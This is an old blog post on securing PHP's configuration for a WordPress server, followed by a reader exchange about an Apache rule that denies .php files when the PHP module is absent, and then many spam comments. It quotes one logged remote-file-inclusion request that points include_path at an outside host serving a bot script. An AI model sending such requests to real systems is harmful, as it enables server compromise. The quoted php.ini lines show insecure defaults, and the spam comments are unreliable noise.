how to secure wordpress server : PHP secure configuration (part I)
Last night, I read a chapter on PHP security from apachesecurity.net. Therein, I found some practical points that can be used to secure PHP’s configuration and its interaction with Apache. Assume we already turned on safe_mode for PHP, per my article on how to secure wordpress server and other LAMP application servers.
For a Wordpress 2.1 server running on an up-to-date FC6/i386 (Fedora Core Linux 6) server, the following PHP secure configuration can be applied to /etc/php.ini. When you see this post, this wordpress blog server has been running with these secure configurations applied.
|
Below, we’ll examine these three secure options one by one. In /etc/php.ini from a stock installation of PHP,
- allow_url_fopen is on by default.
This dangerous since it allows PHP to treat URLs as files. An attack by tainting file-type parameter normally requires it be a file local to the web server. To upload a malicious file to the web server for execution takes different and probably more difficult attacks. With this directive on, however, your PHP script will open URLs as if they were files. It opens the flood gate for the potential attackers. So, turn it off instead. Here is the excerpt from /etc/php.ini.
;Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; allow_url_fopen = On
Below is an attack attempt against this server, as observed in Apache’s access_log (Attacker’s IP address was replaced).
8.8.8.8 - - [03/Feb/2007:17:47:20 -0500] “GET /lib/activeutil.php?set[include_path]=http://w32-gen.us/bot.php? HTTP/1.1″ 404 1244575 160 12240 “-” “null was here.”
- enable_dl is on by default
PHP can load modules dynamically while running, although Apache can’t. If this disabled, we had to explicitly list extension module PHP needed for its function on this site. The few modules are available under /usr/lib/php/modules. For wordpress blog server to function, we need only mysql.so, which was compiled in already (per ‘php -m |grep -i mysql’). Therefore, we need to turn this off.
; Whether or not to enable the dl() function. The dl() function does NOT work properly in multithreaded servers, such as IIS or Zeus, and is automatically disabled on them
enable_dl = On
- eliminate the X-powered-by-PHP header.
In my article, “Part I: how to secure wordpress server and other LAMPs“, we changed Apache directive ‘ServerTokens’ such that the “Server” header says ‘Apache’ only, without leaking information on OS, Apache version, and Apache modules. By default, it is on.
; Misc
;
;Decides whether PHP may expose the fact that it is installed on the server (e.g. by adding its signature to the Web server header). It is no security threat in any way, but it makes it possible to determine whether you use PHP on your server or not.
expose_php = On
- Important Note: if you want to hide this kind of information for security purposes, beware of a few things:
- Obscurity alone is never good security. The identity of your server can be identified through other fingerprints, such as TCP/IP communication style, occurrence or lack of certain file or directory, etc.
- At times, security-by-obscurity could slow down or even duck certain of attacks, esp. those automated attacks based on specific versions of your server components.
- For each every page your server serves, some wordpress themes generate a ‘generator’ META tag to tell the world the exact version of running wordpress server. So, you may want to take at a look at your theme’s header.php as well. For this site, I have the following line:
<meta name=”generator” content=”WordPress <?php bloginfo(’version’);
PHP Security said,
February 2, 2007 @ 12:34 pm
I’m not sure why I do not see this at all, but you should also use a not(!) loadmodule line for the php_module, under httpd.conf, to make sure that if the PHP module was not loaded [by an oversight or mistake], all php regex match files are ‘deny from all’.
experts8 said,
February 2, 2007 @ 12:52 pm
The default on FC6 is to run PHP via mod_php instead of CGI. On this server, CGI module is disabled in httpd.conf, following my own advise on how to secure wordpress server and other LAMP application servers. Therefore, I don’t think you can comment out ‘load php5_module’ in php.conf and still have a functional wordpress blog server on FC6.
Since PHP is what Apache serves for wordpress blog servers, you can’t deny access to them without shutdowing certain parts of your site. For instance, when I submit this comment, it is a ‘POST /wp-comments-post.php’ request to the Apache server.
Or, can you elaborate on what you intend to do?
PHP Security said,
February 2, 2007 @ 7:24 pm
[I hope the comment filters do not eat any of code]
From my httpd.conf…
Not that the ‘IfModule’ directive checks to see if a specific module has been loaded, or compiled in, and this code should be placed at the end of your configuration.
# Security check — if no php module is loaded, Apache should return ‘permissions denied’ on all php(4,5) URL requests
<IfModule !php5_module>
<IfModule !php4_module>
<Location />
<FilesMatch “\.php[45]?$”>
Order allow,deny
Deny from all
</FilesMatch>
</Location>
</IfModule>
</IfModule>
This has nothing to do with cgi-php. If your server is using the php module, and for whatever reason its not loaded, the client will see the source.
experts8 said,
February 2, 2007 @ 8:06 pm
thanks for the clarification. Yeah, good point. I meant to cover hiding source files in general, cgi/php/python/perl, in a post on Apache’s secure configuration. Arguably it could belong to this post on PHP secure configuration as well. What do you think?
PHP Security said,
February 2, 2007 @ 11:32 pm
Sure, why not…
You can even set/override most of the php.ini configuration settings, under httpd.conf, with httpd directive ‘php_value’…
http://www.php.net/manual/en/configuration.changes.php
Just put it all under an .htaccess file, and your almost done. Next step, mod_security…
experts8 said,
February 20, 2007 @ 12:08 am
PHP-security,
Per your advice, I added a section on how to prevent source code serving in the absence of PHP module, in part II of this PHP secure configuration article
christmas tv listing said,
November 29, 2007 @ 8:44 am
Stock squeezes 41% from Amap
Stock squeezes 41% from Amap profitBusiness Report, South Africa -Aug 27, 2007Cohen said Christmas demand for electronic products, including televisions and
christian desktop download free wallpaper said,
December 11, 2007 @ 7:06 pm
Disgraced Scientist Moves Research Base
Disgraced cloning scientist Hwang Woo-suk has relocated his research base to Thailand to avoid the ethical disputes his work would
recipe for homemade pizza sauce said,
December 12, 2007 @ 9:06 am
Graze anatomy - UI The
Graze anatomyUI The Daily Iowan (subscription), IA -10 hours agoThe juice - including pineapple, passion fruit, and lemon - is squeezed daily,
race car driver adult costume said,
December 16, 2007 @ 3:26 pm
Auto Racing: Pecorari off to
Auto Racing: Pecorari off to fast start in Indy Pro SeriesThe Delaware County Times, PA -12 hours agoThe Indy Pro Series Grand
part that world said,
December 17, 2007 @ 9:20 pm
Egypt mufti says female circumcision
Egypt mufti says female circumcision forbiddenReuters AlertNet, UK -9 minutes agoThe practice involves cutting off part or all of the clitoris and
thanksgiving desktop background said,
December 19, 2007 @ 7:50 am
Grand Theft Auto IV trailer
Grand Theft Auto IV trailer parody: Grand Theft Shaman IVMMORPG blog -16 hours agoWhat happens when you mix Blizzard’s World of
oncxzgmk said,
December 20, 2007 @ 2:25 am
oncxzgmk
oncxzgmk
2 hearts kingdom theme said,
December 20, 2007 @ 1:42 pm
Is Desktop Antivirus Dead? -
Is Desktop Antivirus Dead?PC World -Apr 6, 2007″It builds a whitelist of [Dynamic Link Library] files allowed to run, and
bone china cup tea said,
December 24, 2007 @ 5:56 pm
Westin Guangzhou launches Unwind Evening
Westin Guangzhou launches Unwind Evening RitualASIATravelTips.com, Thailand -Jul 10, 2007… where they can hand paint their own piece of bone chinaware -
Best funny happy birthday mp3 songs download said,
December 25, 2007 @ 1:25 pm
Timberlake, Diaz Friendly On Green
Timberlake, Diaz Friendly On Green Carpetcbs4denver.com, CO -1 hour agoShe voices Princess Fiona in the DreamWorks animated blockbuster. “It’s great having
myspace happy birthday wishes said,
December 25, 2007 @ 5:56 pm
Count my policies, not years
Count my policies, not yearsThe Australian, Australia -Jul 25, 2007Steph Clews, a 22-year-old graphic designer and car enthusiast from Wollongong, offered the
india search engine google said,
December 28, 2007 @ 7:22 am
AIRTEL, GOOGLE TO OFFER CUSTOMISED
AIRTEL, GOOGLE TO OFFER CUSTOMISED SERVICES FOR BROADBAND USERSSDA India Magazine, Singapore -Aug 7, 2007Bharti Airtel has joined hands with search engine
Outstanding beach foot girl said,
December 30, 2007 @ 2:02 pm
Going back to class takes
Going back to class takes cashKentucky.com, KY -5 hours agoJacqueline Nasser, Elle-girl fashion market editor, said teens take a cue from shows
25 hdmi cable said,
December 31, 2007 @ 8:59 am
ACCELL SELECTS CES 2008 TO
A built-in signal booster supports HDMI cable runs up to 82 feet (25 meters). The UltraAV 4-8 HDMI Switch features
wwe diva trish stratus pictures said,
December 31, 2007 @ 11:29 am
Trish Stratus discusses her future,
Former WWE Women’s Champion Trish Stratus is hosting a talent search for Toronto’s Second City improve troupe. In an article
all free sports online play games said,
January 8, 2008 @ 1:53 am
NCAA Tourney: Cal Loses in
NCAA Tourney: Cal Loses in Hearbreaker, 62-59CatTracks.net -8 hours ago“I’m just excited we get to play another game,” said Notre Dame
one piece bt said,
January 9, 2008 @ 11:30 am
Rusling’s the man, says BT
Rusling’s the man, says BTMelbourne Herald Sun, Australia -Sep 12, 2007″Everyone knows how talented he is and football watchers have realised that
alaska bouquet candy said,
January 13, 2008 @ 12:56 pm
CONSUMER WATCH Are prepaid funerals
Palmore wrote a check, but later filed a complaint with the Houston Better Business Bureau and hired an attorney. The
remote controlled thermostat said,
January 15, 2008 @ 7:46 pm
CES: Will Zigbee be the
The way Hodges describes it, it may not be ideal to have the electric company taking control of your thermostats.
bible james king large print said,
January 18, 2008 @ 5:05 am
a lot like Christmas -
GOOD QUESTION. WHY can’t we have more nativity scenes in Anchorage? Or, for that matter, how about in Seattle?
size 16 boot said,
January 18, 2008 @ 3:52 pm
First Tranche 2 Eurofighter Typhoon
With 707 aircraft under contract, it is Europe’s largest military collaborative programme and delivers leading-edge technology, strengthening Europe’s …
jeep xj accessory said,
January 18, 2008 @ 8:55 pm
2006 Jeep Commander - New
By John Cappa I stared at the new Jeep Commander thinking someone was trying to mimic the success of the
apartment athens georgia said,
January 30, 2008 @ 4:12 am
Atlanta execs find success at
Escarra also maintains ties to Georgia. Her parents live in Athens, and she stays connected with Bill Bolling, the founder
jl audio speaker said,
February 14, 2008 @ 10:32 pm
McCartney, Mills to lock horns
McCartney, Mills to lock horns in divorce courtReuters Canada, Canada -5 hours agoTheir acrimonious separation, fought out under the harsh glare of
candle gift scented said,
February 16, 2008 @ 8:05 pm
Did she break the rules?
WENDY Alexander became embroiled in a fresh Labour Party donor row last night, when it emerged that the Electoral Commission
cordless phone retro said,
February 19, 2008 @ 5:15 am
New Factory Customized 2009 Edge
New Factory Customized 2009 Edge Sport DebutsHULIQ, NC -Feb 5, 2008This marks the first time that a 22-inch wheel-and-tire combination has been
Thanksgiving Desktop Wallpaper said,
April 22, 2008 @ 5:17 am
Thanksgiving Desktop Wallpaper
Love is an exploding cigar we willingly smoke. Lynda Barry.